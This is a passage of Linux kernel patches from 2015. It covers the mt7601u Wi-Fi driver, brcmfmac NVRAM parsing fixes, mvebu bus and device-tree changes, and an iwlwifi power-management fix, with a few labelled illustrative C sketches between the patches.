+ return 0; +err_hw: + mt7601u_cleanup(dev); +err: + usb_set_intfdata(usb_intf, NULL); + usb_put_dev(interface_to_usbdev(usb_intf)); + + destroy_workqueue(dev->stat_wq); + ieee80211_free_hw(dev->hw); + return ret; +} + +static void mt7601u_disconnect(struct usb_interface *usb_intf) +{ + struct mt7601u_dev *dev = usb_get_intfdata(usb_intf); + + ieee80211_unregister_hw(dev->hw); + mt7601u_cleanup(dev); + + usb_set_intfdata(usb_intf, NULL); + usb_put_dev(interface_to_usbdev(usb_intf)); + + destroy_workqueue(dev->stat_wq); + ieee80211_free_hw(dev->hw); +} + +static int mt7601u_suspend(struct usb_interface *usb_intf, pm_message_t state) +{ + struct mt7601u_dev *dev = usb_get_intfdata(usb_intf); + + mt7601u_cleanup(dev); + + return 0; +} + +static int mt7601u_resume(struct usb_interface *usb_intf) +{ + struct mt7601u_dev *dev = usb_get_intfdata(usb_intf); + + return mt7601u_init_hardware(dev); +} + +MODULE_DEVICE_TABLE(usb, mt7601u_device_table); +MODULE_FIRMWARE(MT7601U_FIRMWARE); +MODULE_LICENSE("GPL"); + +static struct usb_driver mt7601u_driver = { + .name = KBUILD_MODNAME, + .id_table = mt7601u_device_table, + .probe = mt7601u_probe, + .disconnect = mt7601u_disconnect, + .suspend = mt7601u_suspend, + .resume = mt7601u_resume, + .reset_resume = mt7601u_resume, + .soft_unbind = 1, + .disable_hub_initiated_lpm = 1, +}; 
+module_usb_driver(mt7601u_driver); diff --git a/drivers/net/wireless/mediatek/mt7601u/usb.h b/drivers/net/wireless/mediatek/mt7601u/usb.h new file mode 100644 index 000000000000..49e188fa3798 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/usb.h @@ -0,0 +1,77 @@ +/* + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef __MT7601U_USB_H +#define __MT7601U_USB_H + +#include "mt7601u.h" + +#define MT7601U_FIRMWARE "mt7601u.bin" + +#define MT_VEND_REQ_MAX_RETRY 10 +#define MT_VEND_REQ_TOUT_MS 300 + +#define MT_VEND_DEV_MODE_RESET 1 + +enum mt_vendor_req { + MT_VEND_DEV_MODE = 1, + MT_VEND_WRITE = 2, + MT_VEND_MULTI_READ = 7, + MT_VEND_WRITE_FCE = 0x42, +}; + +enum mt_usb_ep_in { + MT_EP_IN_PKT_RX, + MT_EP_IN_CMD_RESP, + __MT_EP_IN_MAX, +}; + +enum mt_usb_ep_out { + MT_EP_OUT_INBAND_CMD, + MT_EP_OUT_AC_BK, + MT_EP_OUT_AC_BE, + MT_EP_OUT_AC_VI, + MT_EP_OUT_AC_VO, + MT_EP_OUT_HCCA, + __MT_EP_OUT_MAX, +}; + +static inline struct usb_device *mt7601u_to_usb_dev(struct mt7601u_dev *mt7601u) +{ + return interface_to_usbdev(to_usb_interface(mt7601u->dev)); +} + +static inline bool mt7601u_urb_has_error(struct urb *urb) +{ + return urb->status && + urb->status != -ENOENT && + urb->status != -ECONNRESET && + urb->status != -ESHUTDOWN; +} + +bool mt7601u_usb_alloc_buf(struct mt7601u_dev *dev, size_t len, + struct mt7601u_dma_buf *buf); +void mt7601u_usb_free_buf(struct mt7601u_dev *dev, struct mt7601u_dma_buf *buf); +int mt7601u_usb_submit_buf(struct mt7601u_dev *dev, int dir, int ep_idx, + struct mt7601u_dma_buf *buf, gfp_t gfp, + usb_complete_t complete_fn, void *context); +void mt7601u_complete_urb(struct urb *urb); + +int mt7601u_vendor_request(struct mt7601u_dev *dev, const u8 req, + const u8 direction, const u16 val, const u16 offset, + void *buf, const size_t buflen); +void mt7601u_vendor_reset(struct mt7601u_dev *dev); +int mt7601u_vendor_single_wr(struct mt7601u_dev *dev, const u8 req, + const u16 offset, const u32 val); + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/util.c b/drivers/net/wireless/mediatek/mt7601u/util.c new file mode 100644 index 000000000000..7c1787c1ddcd --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/util.c @@ -0,0 +1,42 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ */ + +#include "mt7601u.h" + +void mt76_remove_hdr_pad(struct sk_buff *skb) +{ + int len = ieee80211_get_hdrlen_from_skb(skb); + + memmove(skb->data + 2, skb->data, len); + skb_pull(skb, 2); +} + +int mt76_insert_hdr_pad(struct sk_buff *skb) +{ + int len = ieee80211_get_hdrlen_from_skb(skb); + int ret; + + if (len % 4 == 0) + return 0; + + ret = skb_cow(skb, 2); + if (ret) + return ret; + + skb_push(skb, 2); + memmove(skb->data, skb->data + 2, len); + + skb->data[len] = 0; + skb->data[len + 1] = 0; + return 0; +} diff --git a/drivers/net/wireless/mediatek/mt7601u/util.h b/drivers/net/wireless/mediatek/mt7601u/util.h new file mode 100644 index 000000000000..b89140bf1210 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/util.h @@ -0,0 +1,77 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2004 - 2009 Ivo van Doorn + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef __MT76_UTIL_H +#define __MT76_UTIL_H + +/* + * Power of two check, this will check + * if the mask that has been given contains and contiguous set of bits. + * Note that we cannot use the is_power_of_2() function since this + * check must be done at compile-time. + */ +#define is_power_of_two(x) ( !((x) & ((x)-1)) ) +#define low_bit_mask(x) ( ((x)-1) & ~(x) ) +#define is_valid_mask(x) is_power_of_two(1LU + (x) + low_bit_mask(x)) + +/* + * Macros to find first set bit in a variable. + * These macros behave the same as the __ffs() functions but + * the most important difference that this is done during + * compile-time rather then run-time. + */ +#define compile_ffs2(__x) \ + __builtin_choose_expr(((__x) & 0x1), 0, 1) + +#define compile_ffs4(__x) \ + __builtin_choose_expr(((__x) & 0x3), \ + (compile_ffs2((__x))), \ + (compile_ffs2((__x) >> 2) + 2)) + +#define compile_ffs8(__x) \ + __builtin_choose_expr(((__x) & 0xf), \ + (compile_ffs4((__x))), \ + (compile_ffs4((__x) >> 4) + 4)) + +#define compile_ffs16(__x) \ + __builtin_choose_expr(((__x) & 0xff), \ + (compile_ffs8((__x))), \ + (compile_ffs8((__x) >> 8) + 8)) + +#define compile_ffs32(__x) \ + __builtin_choose_expr(((__x) & 0xffff), \ + (compile_ffs16((__x))), \ + (compile_ffs16((__x) >> 16) + 16)) + +/* + * This macro will check the requirements for the FIELD{8,16,32} macros + * The mask should be a constant non-zero contiguous set of bits which + * does not exceed the given typelimit. 
+ */ +#define FIELD_CHECK(__mask) \ + BUILD_BUG_ON(!(__mask) || !is_valid_mask(__mask)) + +#define MT76_SET(_mask, _val) \ + ({ \ + FIELD_CHECK(_mask); \ + (((u32) (_val)) << compile_ffs32(_mask)) & _mask; \ + }) + +#define MT76_GET(_mask, _val) \ + ({ \ + FIELD_CHECK(_mask); \ + (u32) (((_val) & _mask) >> compile_ffs32(_mask)); \ + }) + +#endif From ae8c2366d77cd7c6de776bcb1dcb6be88f2a1185 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rafa=C5=82=20Mi=C5=82ecki?= Date: Wed, 20 May 2015 09:34:21 +0200 Subject: [PATCH 350/872] brcmfmac: simplify check stripping v2 NVRAM MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Comparing NVRAM entry with a full filtering string is simpler than comparing it with a short prefix and then checking random chars at magic offsets. The cost of snprintf relatively low, we execute it just once. Tested on BCM43602 with NVRAM hacked to use V2 format. Signed-off-by: Rafał Miłecki Signed-off-by: Kalle Valo --- .../net/wireless/brcm80211/brcmfmac/firmware.c | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c index 8ff31ffa4a41..181a0e848582 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c @@ -25,7 +25,7 @@ #define BRCMF_FW_MAX_NVRAM_SIZE 64000 #define BRCMF_FW_NVRAM_DEVPATH_LEN 19 /* devpath0=pcie/1/4/ */ -#define BRCMF_FW_NVRAM_PCIEDEV_LEN 9 /* pcie/1/4/ */ +#define BRCMF_FW_NVRAM_PCIEDEV_LEN 10 /* pcie/1/4/ + \0 */ char brcmf_firmware_path[BRCMF_FW_PATH_LEN]; module_param_string(firmware_path, brcmf_firmware_path, @@ -297,6 +297,8 @@ static void brcmf_fw_strip_multi_v1(struct nvram_parser *nvp, u16 domain_nr, static void brcmf_fw_strip_multi_v2(struct nvram_parser *nvp, u16 domain_nr, u16 bus_nr) { + char prefix[BRCMF_FW_NVRAM_PCIEDEV_LEN]; + size_t len; u32 i, j; u8 *nvram; @@ -308,14 +310,13 @@ static void brcmf_fw_strip_multi_v2(struct nvram_parser *nvp, u16 domain_nr, * Valid entries are of type pcie/X/Y/ where X = domain_nr and * Y = bus_nr. */ + snprintf(prefix, sizeof(prefix), "pcie/%d/%d/", domain_nr, bus_nr); + len = strlen(prefix); i = 0; j = 0; - while (i < nvp->nvram_len - BRCMF_FW_NVRAM_PCIEDEV_LEN) { - if ((strncmp(&nvp->nvram[i], "pcie/", 5) == 0) && - (nvp->nvram[i + 6] == '/') && (nvp->nvram[i + 8] == '/') && - ((nvp->nvram[i + 5] - '0') == domain_nr) && - ((nvp->nvram[i + 7] - '0') == bus_nr)) { - i += BRCMF_FW_NVRAM_PCIEDEV_LEN; + while (i < nvp->nvram_len - len) { + if (strncmp(&nvp->nvram[i], prefix, len) == 0) { + i += len; while (nvp->nvram[i] != 0) { nvram[j] = nvp->nvram[i]; i++; From 5d08408b6f6b28d9a57ab7b2c7419ca8bfc6b8a4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rafa=C5=82=20Mi=C5=82ecki?= Date: Wed, 20 May 2015 11:01:08 +0200 Subject: [PATCH 351/872] brcmfmac: simplify check finding NVRAM v1 device path MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit With a simple use of snprintf and small buffer we can compare NVRAM entry value with a full string. This way we avoid checking random chars at magic offsets. Tested on BCM43602 with NVRAM hacked to use v1 format. 
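For illustration, a minimal standalone sketch of this matching approach (not code from the patch; the helper name, the 32-byte buffer and the test strings are made up for the example):

  #include <stdio.h>
  #include <string.h>

  /* Return non-zero when an NVRAM line of the form "devpathX=pcie/D/B/"
   * matches the wanted domain/bus pair. The full "=pcie/D/B" string is
   * built once with snprintf and compared in one go, instead of testing
   * single characters at fixed offsets.
   */
  static int devpath_matches(const char *entry, int domain_nr, int bus_nr)
  {
      char pcie_path[32];
      size_t pcie_len;

      if (strncmp(entry, "devpath", 7) != 0)
          return 0;

      snprintf(pcie_path, sizeof(pcie_path), "=pcie/%d/%d",
               domain_nr, bus_nr);
      pcie_len = strlen(pcie_path);

      /* entry[7] is the virtual ID digit, the value starts at entry[8] */
      return strncmp(&entry[8], pcie_path, pcie_len) == 0;
  }

  int main(void)
  {
      printf("%d\n", devpath_matches("devpath0=pcie/1/4/", 1, 4)); /* 1 */
      printf("%d\n", devpath_matches("devpath0=pcie/2/4/", 1, 4)); /* 0 */
      return 0;
  }

The real parser additionally records the virtual ID digit and keeps scanning the NVRAM buffer, but the match itself reduces to a single strncmp() against the prepared string, as the diff below shows.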
Signed-off-by: Rafał Miłecki Signed-off-by: Kalle Valo --- .../net/wireless/brcm80211/brcmfmac/firmware.c | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c index 181a0e848582..a1e1253a06c8 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c @@ -222,6 +222,10 @@ static int brcmf_init_nvram_parser(struct nvram_parser *nvp, static void brcmf_fw_strip_multi_v1(struct nvram_parser *nvp, u16 domain_nr, u16 bus_nr) { + /* Device path with a leading '=' key-value separator */ + char pcie_path[] = "=pcie/?/?"; + size_t pcie_len; + u32 i, j; bool found; u8 *nvram; @@ -238,6 +242,9 @@ static void brcmf_fw_strip_multi_v1(struct nvram_parser *nvp, u16 domain_nr, /* First search for the devpathX and see if it is the configuration * for domain_nr/bus_nr. Search complete nvp */ + snprintf(pcie_path, sizeof(pcie_path), "=pcie/%d/%d", domain_nr, + bus_nr); + pcie_len = strlen(pcie_path); found = false; i = 0; while (i < nvp->nvram_len - BRCMF_FW_NVRAM_DEVPATH_LEN) { @@ -245,13 +252,10 @@ static void brcmf_fw_strip_multi_v1(struct nvram_parser *nvp, u16 domain_nr, * Y = domain_nr, Z = bus_nr, X = virtual ID */ if ((strncmp(&nvp->nvram[i], "devpath", 7) == 0) && - (strncmp(&nvp->nvram[i + 8], "=pcie/", 6) == 0)) { - if (((nvp->nvram[i + 14] - '0') == domain_nr) && - ((nvp->nvram[i + 16] - '0') == bus_nr)) { - id = nvp->nvram[i + 7] - '0'; - found = true; - break; - } + (strncmp(&nvp->nvram[i + 8], pcie_path, pcie_len) == 0)) { + id = nvp->nvram[i + 7] - '0'; + found = true; + break; } while (nvp->nvram[i] != 0) i++; From 279b4cb7bc143643b6380a7198834f3bfbee7df7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rafa=C5=82=20Mi=C5=82ecki?= Date: Wed, 20 May 2015 13:59:54 +0200 Subject: [PATCH 352/872] brcmfmac: treat \0 as end of comment when parsing NVRAM MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This fixes brcmfmac dealing with NVRAM coming from platform e.g. from a flash MTD partition. In such cases entries are separated by \0 instead of \n which caused ignoring whole content after the first "comment". While platform NVRAM doesn't usually contain comments, we switch to COMMENT state after e.g. finding an unexpected char in key name. 
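The effect of the new handling can be sketched with a small self-contained helper (an assumed example, not the driver's brcmf_nvram_handle_comment(); the function name and the explicit length bound are inventions for the demo):

  #include <stddef.h>

  /* Skip a comment in an NVRAM image where entries may be separated by
   * '\n' (text NVRAM loaded from a file) or by '\0' (platform NVRAM read
   * from flash). Returns the offset of the first character after the
   * comment, or len if neither separator is found before the buffer end.
   */
  static size_t nvram_skip_comment(const char *data, size_t len, size_t pos)
  {
      while (pos < len) {
          char c = data[pos++];

          if (c == '\n' || c == '\0')
              return pos;
      }
      return len;
  }

With the old code only '\n' ended a comment, so a '\0'-separated platform image made the parser treat everything after the first skipped entry as one endless comment.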
Signed-off-by: Rafał Miłecki Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/firmware.c | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c index a1e1253a06c8..e6673a9b6e9e 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c @@ -162,17 +162,20 @@ brcmf_nvram_handle_value(struct nvram_parser *nvp) static enum nvram_parser_state brcmf_nvram_handle_comment(struct nvram_parser *nvp) { - char *eol, *sol; + char *eoc, *sol; sol = (char *)&nvp->fwnv->data[nvp->pos]; - eol = strchr(sol, '\n'); - if (eol == NULL) - return END; + eoc = strchr(sol, '\n'); + if (!eoc) { + eoc = strchr(sol, '\0'); + if (!eoc) + return END; + } /* eat all moving to next line */ nvp->line++; nvp->column = 1; - nvp->pos += (eol - sol) + 1; + nvp->pos += (eoc - sol) + 1; return IDLE; } From fc23e81eb8f4231aa8a34c83e95c11d72e494f1d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rafa=C5=82=20Mi=C5=82ecki?= Date: Sat, 23 May 2015 09:15:33 +0200 Subject: [PATCH 353/872] brcmfmac: allow NVRAM values to contain spaces MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Platform NVRAMs often contain values with spaces. Even if right now most firmware-supported entries are simple values, we shouldn't reject these with spaces. It was semi-confirmed by Broadcom in the early patch adding support for platform NVRAMs. Signed-off-by: Rafał Miłecki Acked-by: Arend van Spriel Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/firmware.c | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c index e6673a9b6e9e..7ae6461df932 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c @@ -66,6 +66,12 @@ struct nvram_parser { bool multi_dev_v2; }; +/** + * is_nvram_char() - check if char is a valid one for NVRAM entry + * + * It accepts all printable ASCII chars except for '#' which opens a comment. + * Please note that ' ' (space) while accepted is not a valid key name char. + */ static bool is_nvram_char(char c) { /* comment marker excluded */ @@ -73,7 +79,7 @@ static bool is_nvram_char(char c) return false; /* key and value may have any other readable character */ - return (c > 0x20 && c < 0x7f); + return (c >= 0x20 && c < 0x7f); } static bool is_whitespace(char c) @@ -120,7 +126,7 @@ static enum nvram_parser_state brcmf_nvram_handle_key(struct nvram_parser *nvp) nvp->multi_dev_v1 = true; if (strncmp(&nvp->fwnv->data[nvp->entry], "pcie/", 5) == 0) nvp->multi_dev_v2 = true; - } else if (!is_nvram_char(c)) { + } else if (!is_nvram_char(c) || c == ' ') { brcmf_dbg(INFO, "warning: ln=%d:col=%d: '=' expected, skip invalid key entry\n", nvp->line, nvp->column); return COMMENT; From 2ff9ab4c7b6d17c82a01e3449173465cf742e897 Mon Sep 17 00:00:00 2001 From: Imre Kaloz Date: Wed, 20 May 2015 23:22:04 +0200 Subject: [PATCH 354/872] ARM: mvebu: armada-xp-linksys-mamba: Disable internal RTC The Mamba (like the OpenBlocks AX3) doesn't have a crystal connected to the internal RTC - let's prevent the kernel from probing it. 
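The NVRAM character-validation change above (allowing ' ' in values while still rejecting it in key names) can be summarised in two small predicates. This sketch mirrors the patch; the key-name helper is added here purely for illustration:

#include <stdbool.h>

/* Accept all printable ASCII except '#', which opens a comment.  Space is
 * printable and therefore accepted; key parsing rejects it separately.
 */
static bool is_nvram_char(char c)
{
	if (c == '#')
		return false;
	return c >= 0x20 && c < 0x7f;
}

/* Illustrative helper: keys may not contain spaces. */
static bool is_valid_key_char(char c)
{
	return is_nvram_char(c) && c != ' ';
}

int main(void)
{
	return is_nvram_char(' ') && !is_valid_key_char(' ') ? 0 : 1;
}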
Signed-off-by: Imre Kaloz Cc: # v4.0 + Signed-off-by: Gregory CLEMENT --- arch/arm/boot/dts/armada-xp-linksys-mamba.dts | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/arch/arm/boot/dts/armada-xp-linksys-mamba.dts b/arch/arm/boot/dts/armada-xp-linksys-mamba.dts index a2cf2154dcdb..fdd187c55aa5 100644 --- a/arch/arm/boot/dts/armada-xp-linksys-mamba.dts +++ b/arch/arm/boot/dts/armada-xp-linksys-mamba.dts @@ -95,6 +95,11 @@ internal-regs { + rtc@10300 { + /* No crystal connected to the internal RTC */ + status = "disabled"; + }; + /* J10: VCC, NC, RX, NC, TX, GND */ serial@12000 { status = "okay"; From 8c9e06e64768665503e778088a39ecff3a6f2e0c Mon Sep 17 00:00:00 2001 From: Nicolas Schichan Date: Thu, 28 May 2015 10:40:12 +0200 Subject: [PATCH 355/872] bus: mvebu-mbus: do not set WIN_CTRL_SYNCBARRIER on non io-coherent platforms. Commit a0b5cd4ac2d6 ("bus: mvebu-mbus: use automatic I/O synchronization barriers") enabled the usage of automatic I/O synchronization barriers by enabling bit WIN_CTRL_SYNCBARRIER in the control registers of MBus windows, but on non io-coherent platforms (orion5x, kirkwood and dove) the WIN_CTRL_SYNCBARRIER bit in the window control register is either reserved (all windows except 6 and 7) or enables read-only protection (windows 6 and 7). Signed-off-by: Nicolas Schichan Reviewed-by: Thomas Petazzoni Cc: # v4.0+ Fixes: a0b5cd4ac2d6 ("bus: mvebu-mbus: use automatic I/O synchronization barriers") Signed-off-by: Thomas Petazzoni Signed-off-by: Gregory CLEMENT --- drivers/bus/mvebu-mbus.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/bus/mvebu-mbus.c b/drivers/bus/mvebu-mbus.c index fb9ec6221730..7fa4510dfbe4 100644 --- a/drivers/bus/mvebu-mbus.c +++ b/drivers/bus/mvebu-mbus.c @@ -70,6 +70,7 @@ */ #define WIN_CTRL_OFF 0x0000 #define WIN_CTRL_ENABLE BIT(0) +/* Only on HW I/O coherency capable platforms */ #define WIN_CTRL_SYNCBARRIER BIT(1) #define WIN_CTRL_TGT_MASK 0xf0 #define WIN_CTRL_TGT_SHIFT 4 @@ -323,8 +324,9 @@ static int mvebu_mbus_setup_window(struct mvebu_mbus_state *mbus, ctrl = ((size - 1) & WIN_CTRL_SIZE_MASK) | (attr << WIN_CTRL_ATTR_SHIFT) | (target << WIN_CTRL_TGT_SHIFT) | - WIN_CTRL_SYNCBARRIER | WIN_CTRL_ENABLE; + if (mbus->hw_io_coherency) + ctrl |= WIN_CTRL_SYNCBARRIER; writel(base & WIN_BASE_LOW, addr + WIN_BASE_OFF); writel(ctrl, addr + WIN_CTRL_OFF); From 885dbd154b2f2ee305cec6fd0a162e1a77ae2b06 Mon Sep 17 00:00:00 2001 From: Thomas Petazzoni Date: Thu, 28 May 2015 10:40:13 +0200 Subject: [PATCH 356/872] Revert "bus: mvebu-mbus: make sure SDRAM CS for DMA don't overlap the MBus bridge window" This reverts commit 1737cac69369 ("bus: mvebu-mbus: make sure SDRAM CS for DMA don't overlap the MBus bridge window"), because it breaks DMA on platforms having more than 2 GB of RAM. This commit changed the information reported to DMA masters device drivers through the mv_mbus_dram_info() function so that the returned DRAM ranges do not overlap with I/O windows. This was necessary as a preparation to support the new CESA Crypto Engine driver, which will use DMA for cryptographic operations. But since it does DMA with the SRAM which is mapped as an I/O window, having DRAM ranges overlapping with I/O windows was problematic. To solve this, the above mentioned commit changed the mvebu-mbus to adjust the DRAM ranges so that they don't overlap with the I/O windows. However, by doing this, we re-adjust the DRAM ranges in a way that makes them have a size that is no longer a power of two. 
While this is perfectly fine for the Crypto Engine, which supports DRAM ranges with a granularity of 64 KB, it breaks basically all other DMA masters, which expect power of two sizes for the DRAM ranges. Due to this, if the installed system memory is 4 GB, in two chip-selects of 2 GB, the second DRAM range will be reduced from 2 GB to a little bit less than 2 GB to not overlap with the I/O windows, in a way that results in a DRAM range that doesn't have a power of two size. This means that whenever you do a DMA transfer with an address located in the [ 2 GB ; 4 GB ] area, it will freeze the system. Any serious DMA activity like simply running: for i in $(seq 1 64) ; do dd if=/dev/urandom of=file$i bs=1M count=16 ; done in an ext3 partition mounted over a SATA drive will freeze the system. Since the new CESA crypto driver that uses DMA has not been merged yet, the easiest fix is to simply revert this commit. A follow-up commit will introduce a different solution for the CESA crypto driver. Signed-off-by: Thomas Petazzoni Fixes: 1737cac69369 ("bus: mvebu-mbus: make sure SDRAM CS for DMA don't overlap the MBus bridge window") Cc: # v4.0+ Signed-off-by: Gregory CLEMENT --- drivers/bus/mvebu-mbus.c | 105 ++++++--------------------------------- 1 file changed, 16 insertions(+), 89 deletions(-) diff --git a/drivers/bus/mvebu-mbus.c b/drivers/bus/mvebu-mbus.c index 7fa4510dfbe4..6f047dcb94c2 100644 --- a/drivers/bus/mvebu-mbus.c +++ b/drivers/bus/mvebu-mbus.c @@ -58,7 +58,6 @@ #include #include #include -#include /* * DDR target is the same on all platforms. @@ -103,9 +102,7 @@ /* Relative to mbusbridge_base */ #define MBUS_BRIDGE_CTRL_OFF 0x0 -#define MBUS_BRIDGE_SIZE_MASK 0xffff0000 #define MBUS_BRIDGE_BASE_OFF 0x4 -#define MBUS_BRIDGE_BASE_MASK 0xffff0000 /* Maximum number of windows, for all known platforms */ #define MBUS_WINS_MAX 20 @@ -579,106 +576,36 @@ static unsigned int armada_xp_mbus_win_remap_offset(int win) return MVEBU_MBUS_NO_REMAP; } -/* - * Use the memblock information to find the MBus bridge hole in the - * physical address space. - */ -static void __init -mvebu_mbus_find_bridge_hole(uint64_t *start, uint64_t *end) -{ - struct memblock_region *r; - uint64_t s = 0; - - for_each_memblock(memory, r) { - /* - * This part of the memory is above 4 GB, so we don't - * care for the MBus bridge hole. - */ - if (r->base >= 0x100000000) - continue; - - /* - * The MBus bridge hole is at the end of the RAM under - * the 4 GB limit. - */ - if (r->base + r->size > s) - s = r->base + r->size; - } - - *start = s; - *end = 0x100000000; -} - static void __init mvebu_mbus_default_setup_cpu_target(struct mvebu_mbus_state *mbus) { int i; int cs; - uint64_t mbus_bridge_base, mbus_bridge_end; mvebu_mbus_dram_info.mbus_dram_target_id = TARGET_DDR; - mvebu_mbus_find_bridge_hole(&mbus_bridge_base, &mbus_bridge_end); - for (i = 0, cs = 0; i < 4; i++) { - u64 base = readl(mbus->sdramwins_base + DDR_BASE_CS_OFF(i)); - u64 size = readl(mbus->sdramwins_base + DDR_SIZE_CS_OFF(i)); - u64 end; - struct mbus_dram_window *w; - - /* Ignore entries that are not enabled */ - if (!(size & DDR_SIZE_ENABLED)) - continue; - - /* - * Ignore entries whose base address is above 2^32, - * since devices cannot DMA to such high addresses - */ - if (base & DDR_BASE_CS_HIGH_MASK) - continue; - - base = base & DDR_BASE_CS_LOW_MASK; - size = (size | ~DDR_SIZE_MASK) + 1; - end = base + size; - - /* - * Adjust base/size of the current CS to make sure it - * doesn't overlap with the MBus bridge hole. 
This is - * particularly important for devices that do DMA from - * DRAM to a SRAM mapped in a MBus window, such as the - * CESA cryptographic engine. - */ + u32 base = readl(mbus->sdramwins_base + DDR_BASE_CS_OFF(i)); + u32 size = readl(mbus->sdramwins_base + DDR_SIZE_CS_OFF(i)); /* - * The CS is fully enclosed inside the MBus bridge - * area, so ignore it. + * We only take care of entries for which the chip + * select is enabled, and that don't have high base + * address bits set (devices can only access the first + * 32 bits of the memory). */ - if (base >= mbus_bridge_base && end <= mbus_bridge_end) - continue; + if ((size & DDR_SIZE_ENABLED) && + !(base & DDR_BASE_CS_HIGH_MASK)) { + struct mbus_dram_window *w; - /* - * Beginning of CS overlaps with end of MBus, raise CS - * base address, and shrink its size. - */ - if (base >= mbus_bridge_base && end > mbus_bridge_end) { - size -= mbus_bridge_end - base; - base = mbus_bridge_end; + w = &mvebu_mbus_dram_info.cs[cs++]; + w->cs_index = i; + w->mbus_attr = 0xf & ~(1 << i); + if (mbus->hw_io_coherency) + w->mbus_attr |= ATTR_HW_COHERENCY; + w->base = base & DDR_BASE_CS_LOW_MASK; + w->size = (size | ~DDR_SIZE_MASK) + 1; } - - /* - * End of CS overlaps with beginning of MBus, shrink - * CS size. - */ - if (base < mbus_bridge_base && end > mbus_bridge_base) - size -= end - mbus_bridge_base; - - w = &mvebu_mbus_dram_info.cs[cs++]; - w->cs_index = i; - w->mbus_attr = 0xf & ~(1 << i); - if (mbus->hw_io_coherency) - w->mbus_attr |= ATTR_HW_COHERENCY; - w->base = base; - w->size = size; } mvebu_mbus_dram_info.num_cs = cs; } From fc8a350d0b8df744fd6d3c55907b3886979d2638 Mon Sep 17 00:00:00 2001 From: Ilan Peer Date: Wed, 13 May 2015 14:34:07 +0300 Subject: [PATCH 357/872] iwlwifi: pcie: fix tracking of cmd_in_flight The cmd_in_flight tracking was introduced to workaround faulty power management hardware, by having the driver keep the NIC awake as long as there are commands in flight. However, some of the code handling this workaround was unconditionally executed, which resulted with an inconsistent state where the driver assumed that the NIC was awake although it wasn't. Fix this by renaming 'cmd_in_flight' to 'cmd_hold_nic_awake' and handling the NIC requested awake state only for hardwares for which the workaround is needed. Signed-off-by: Ilan Peer Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/pcie/internal.h | 6 ++--- drivers/net/wireless/iwlwifi/pcie/trans.c | 4 ++-- drivers/net/wireless/iwlwifi/pcie/tx.c | 23 ++++++++------------ 3 files changed, 14 insertions(+), 19 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/pcie/internal.h b/drivers/net/wireless/iwlwifi/pcie/internal.h index 01996c9d98a7..376b84e54ad7 100644 --- a/drivers/net/wireless/iwlwifi/pcie/internal.h +++ b/drivers/net/wireless/iwlwifi/pcie/internal.h @@ -1,7 +1,7 @@ /****************************************************************************** * - * Copyright(c) 2003 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2003 - 2015 Intel Corporation. All rights reserved. + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * Portions of this file are derived from the ipw3945 project, as well * as portions of the ieee80211 subsystem header files. 
